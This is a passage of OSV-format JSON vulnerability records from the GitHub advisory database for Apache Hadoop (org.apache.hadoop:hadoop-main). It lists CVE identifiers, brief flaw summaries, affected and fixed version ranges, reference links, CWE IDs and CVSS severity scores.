"3.0.1" } ] } ], "versions": [ "3.0.0-beta1", "3.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-4fh8-pm7g-pmxq/GHSA-4fh8-pm7g-pmxq.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-4fh8-pm7g-pmxq/GHSA-4fh8-pm7g-pmxq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11764" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r790ad0a049cde713b93589ecfd4dd2766fda0fc6807eedb6cf69f5c1%40%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201103-0003" } ], "database_specific": { "cwe_ids": [ "CWE-306" ], "github_reviewed": true, "github_reviewed_at": "2021-04-22T21:44:53Z", "nvd_published_at": "2020-10-21T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5cf4-jqwp-584g", "published": "2019-03-25T16:17:32Z", "modified": "2024-02-19T05:28:21.165145Z", "aliases": [ "CVE-2018-11767" ], "summary": "Improper Privilege Management in org.apache.hadoop:hadoop-main", "details": "In Apache Hadoop 2.9.0 to 2.9.1, 2.8.3 to 2.8.4, 2.7.5 to 2.7.6, KMS blocking users or granting access to users incorrectly, if the system uses non-default groups mapping mechanisms.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.5" }, { "fixed": "2.7.7" } ] } ], "versions": [ "2.7.5", "2.7.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-5cf4-jqwp-584g/GHSA-5cf4-jqwp-584g.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.3" }, { "fixed": "2.8.5" } ] } ], "versions": [ "2.8.3", "2.8.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-5cf4-jqwp-584g/GHSA-5cf4-jqwp-584g.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": 
"ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.2" } ] } ], "versions": [ "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-5cf4-jqwp-584g/GHSA-5cf4-jqwp-584g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11767" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-5cf4-jqwp-584g" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/246cf223e7dc0c1dff90b78dccb6c3fe94e1a044dbf98e2333393302@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5a44590b4eedc5e25f5bd3081d1631b52c174b5b99157f7950ddc270@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fb771f66946dd5c99a8a5713347c24873846f555d716f9ac17bccca@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190416-0009" } ], "database_specific": { "cwe_ids": [ "CWE-269" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:00:30Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6x48-j4x4-cqw3", "published": "2018-12-21T17:50:29Z", "modified": "2024-03-04T23:01:37.312585Z", "aliases": [ "CVE-2018-8009" ], "summary": "Path Traversal in Hadoop", "details": "Apache Hadoop 3.1.0, 3.0.0-alpha to 3.0.2, 2.9.0 to 2.9.1, 2.8.0 to 2.8.4, 2.0.0-alpha to 2.7.6, 0.23.0 to 0.23.11 is exploitable via the zip slip vulnerability in places that accept a zip file.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": 
"pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.1.0" }, { "fixed": "3.1.1" } ] } ], "versions": [ "3.1.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.3" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.2" } ] } ], "versions": [ "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.5" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.7" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", 
"0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8009" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/12258c7cff8d32710fbd8b9088a930e3ce27432" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/45a1c680c276c4501402f7bc4cebcf85a6fbc7f" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/65e55097da2bb3f2fbdf9ba1946da25fe58bec9" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/6a4ae6f6eeed1392a4828a5721fa1499f65bdde" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/fc4c20fc3469674cb584a4fb98bac7e3c2277c9" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-6x48-j4x4-cqw3" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://hadoop.apache.org/cve_list.html#cve-2018-8009-http-cve-mitre-org-cgi-bin-cvename-cgi-name-cve-2018-8009-zip-slip-impact-on-apache-hadoop" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a1c227745ce30acbcf388c5b0cc8423e8bf495d619cd0fa973f7f38d@%3Cuser.hadoop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r4dddf1705dbedfa94392913b2dad1cd2d1d89040facd389eea0b3510@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb21df54a4e39732ce653d2aa5672e36a792b59eb6717f2a06bb8d02a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/research/zip-slip-vulnerability" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/105927" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:20:31Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-99qr-9cc9-fv2x", "published": "2018-12-21T17:50:03Z", "modified": "2023-11-08T03:59:20.833209Z", "aliases": [ "CVE-2017-3166" ], "summary": "Moderate severity vulnerability that affects org.apache.hadoop:hadoop-main", "details": "In Apache Hadoop versions 2.6.1 to 2.6.5, 2.7.0 to 2.7.3, and 3.0.0-alpha1, if a file in an encryption zone with access permissions that make it world readable is localized via YARN's localization mechanism, that file will be stored in a world-readable location and can be shared freely with any application that requests to localize that file.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.3" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-99qr-9cc9-fv2x/GHSA-99qr-9cc9-fv2x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-3166" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-99qr-9cc9-fv2x" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2e16689b44bdd1976b6368c143a4017fc7159d1f2d02a5d54fe9310f@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-732" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:28:07Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c6f9-4pmv-m7m6", "published": "2022-05-17T02:54:07Z", "modified": "2024-12-06T05:37:36.225387Z", "aliases": [ "CVE-2012-1574" ], "summary": "Apache Hadoop allows impersonation of arbitrary cluster user accounts", "details": "The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.23" }, { "fixed": "0.23.2" } ] } ], "versions": [ "0.23.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-c6f9-4pmv-m7m6/GHSA-c6f9-4pmv-m7m6.json" } }, { "package": { 
"name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0" }, { "fixed": "1.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-c6f9-4pmv-m7m6/GHSA-c6f9-4pmv-m7m6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-1574" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://seclists.org/fulldisclosure/2012/Apr/70" }, { "type": "WEB", "url": "https://web.archive.org/web/20120720041621/https://ccp.cloudera.com/display/DOC/Cloudera+Security+Bulletin#ClouderaSecurityBulletin-MapReducewithSecurity" }, { "type": "WEB", "url": "https://web.archive.org/web/20151001135054/http://archives.neohapsis.com/archives/bugtraq/2012-04/0051.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20161215212154/https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html#topic_1_0_2" }, { "type": "WEB", "url": "https://web.archive.org/web/20200229125105/http://www.securityfocus.com/bid/52939" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2023-08-29T21:08:04Z", "nvd_published_at": "2012-04-12T10:45:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-hx83-rpqf-m267", "published": "2019-11-20T01:38:00Z", "modified": "2023-11-08T03:59:47.193372Z", "aliases": [ "CVE-2018-11768" ], "summary": "user/group information can be corrupted across storing in fsimage and reading back from fsimage", "details": "In Apache Hadoop 3.1.0 to 3.1.1, 3.0.0-alpha1 to 3.0.3, 2.9.0 to 2.9.1, and 2.0.0-alpha to 2.8.4, the user/group information can be corrupted across storing in fsimage and reading back from fsimage.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", 
"ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2.0" }, { "fixed": "2.8.5" } ] } ], "versions": [ "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-hx83-rpqf-m267/GHSA-hx83-rpqf-m267.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.2" } ] } ], "versions": [ "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-hx83-rpqf-m267/GHSA-hx83-rpqf-m267.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.1" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.1.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-hx83-rpqf-m267/GHSA-hx83-rpqf-m267.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11768" }, { "type": "WEB", "url": "https://hadoop.apache.org/cve_list.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2067a797b330530a6932f4b08f703b3173253d0a2b7c8c524e54adaf@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2c9cc65864be0058a5d5ed2025dfb9c700bf23d352b0c826c36ff96a@%3Chdfs-dev.hadoop.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/72ca514e01cd5f08151e74f9929799b4cbe1b6e9e6cd24faa72ffcc6@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9b609d4392d886711e694cf40d86f770022baf42a1b1aa97e8244c87@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/caacbbba2dcc1105163f76f3dfee5fbd22e0417e0783212787086378@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ceb16af9139ab0fea24aef935b6321581976887df7ad632e9a515dda@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ea6d2dfbefab8ebe46be18b05136b83ae53b7866f1bc60c680a2b600@%3Chdfs-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f20bb4e055d8394fc525cc7772fb84096f706389043e76220c8a29a4@%3Chdfs-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cuser.flink.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-119" ], "github_reviewed": true, "github_reviewed_at": "2019-11-19T03:28:12Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mq8p-h798-xcrp", "published": "2018-12-21T17:50:20Z", "modified": "2023-11-08T03:58:58.669059Z", "aliases": [ "CVE-2017-15718" ], "summary": "Exposure of Sensitive Information in Hadoop", "details": "The YARN NodeManager in Apache Hadoop 2.7.3 and 2.7.4 can leak the password for credential store provider used by the NodeManager to YARN Applications.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": 
"pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.3" }, { "fixed": "2.7.5" } ] } ], "versions": [ "2.7.3", "2.7.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-mq8p-h798-xcrp/GHSA-mq8p-h798-xcrp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15718" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mq8p-h798-xcrp" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/773c93c2d8a6a52bbe97610c2b1c2ad205b970e1b8c04fb5b2fccad6@%3Cgeneral.hadoop.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:47:00Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rhh9-cm65-3w54", "published": "2021-04-30T17:29:30Z", "modified": "2024-02-17T05:34:33.603105Z", "aliases": [ "CVE-2018-11765" ], "summary": "Improper Authentication in Apache Hadoop", "details": "In Apache Hadoop versions 3.0.0-alpha2 to 3.0.0, 2.9.0 to 2.9.2, 2.8.0 to 2.8.5, any users can access some servlets without authentication when Kerberos authentication is enabled and SPNEGO through HTTP is not enabled.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-alpha2" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0", "3.0.0-alpha2", "3.0.0-alpha3", "3.0.0-alpha4", "3.0.0-beta1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.0.0", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-rhh9-cm65-3w54/GHSA-rhh9-cm65-3w54.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.3" } ] } ], "versions": [ "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-rhh9-cm65-3w54/GHSA-rhh9-cm65-3w54.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.6" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.5", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-rhh9-cm65-3w54/GHSA-rhh9-cm65-3w54.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11765" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17d94d132b207dad221595fd8b8b18628f5f5ec7e3f5be939ecd8928@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c7f899911a04164ed1707083fcd4135f8427e04778c87d83509b0da%40%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46447f38ea8c89421614e9efd7de5e656186d35e10fc97cf88477a01@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4dddf1705dbedfa94392913b2dad1cd2d1d89040facd389eea0b3510@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r74825601e93582167eb7cdc2f764c74c9c6d8006fa90018562fda60f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79b15c5b66c6df175d01d7560adf0cd5c369129b9a161905e0339927@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb21df54a4e39732ce653d2aa5672e36a792b59eb6717f2a06bb8d02a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb241464d83baa3749b08cd3dabc8dba70a9a9027edcef3b5d4c24ef4@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe25cac0f499374f8ae17a4a44a8404927b56de28d4c41940d82b7a4@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reea5eb8622afbfbfca46bc758f79db83d90a3263a906c4d1acba4971@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9dfa8b77585c9227db9637552eebb2ab029255a0db4eb76c2b6c4cf@%3Cdev.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201016-0005" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-04-27T21:56:41Z", "nvd_published_at": "2020-09-30T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rqj9-cq6j-958r", "published": "2018-12-21T17:50:26Z", "modified": "2024-12-02T05:44:05.029076Z", "aliases": [ "CVE-2018-11766" ], "summary": "Arbitrary Command Execution in Hadoop", "details": "In Apache Hadoop 2.7.4 to 2.7.6, the security fix for CVE-2016-6811 is incomplete. 
A user who can escalate to yarn user can possibly run arbitrary commands as root user.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.4" }, { "fixed": "2.7.7" } ] } ], "versions": [ "2.7.4", "2.7.5", "2.7.6" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-rqj9-cq6j-958r/GHSA-rqj9-cq6j-958r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11766" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-rqj9-cq6j-958r" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff37bbbe09d5f03090e2dd2c3dea95de16ef4249e731f19b8959ce4c@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106035" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:55:32Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v569-g72v-q434", "published": "2019-02-12T17:26:12Z", "modified": "2023-11-08T03:59:51.778695Z", "aliases": [ "CVE-2018-1296" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Hadoop", "details": "In Apache Hadoop 3.0.0-alpha1 to 3.0.0, 2.9.0, 2.8.0 to 2.8.3, and 2.5.0 to 2.7.5, HDFS exposes extended attribute key/value pairs during listXAttrs, verifying only path-level search access to the directory rather than path-level read permission to the referent.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { 
"introduced": "0" }, { "fixed": "2.7.6" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-v569-g72v-q434/GHSA-v569-g72v-q434.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2", "2.8.3" ], "database_specific": { "source": 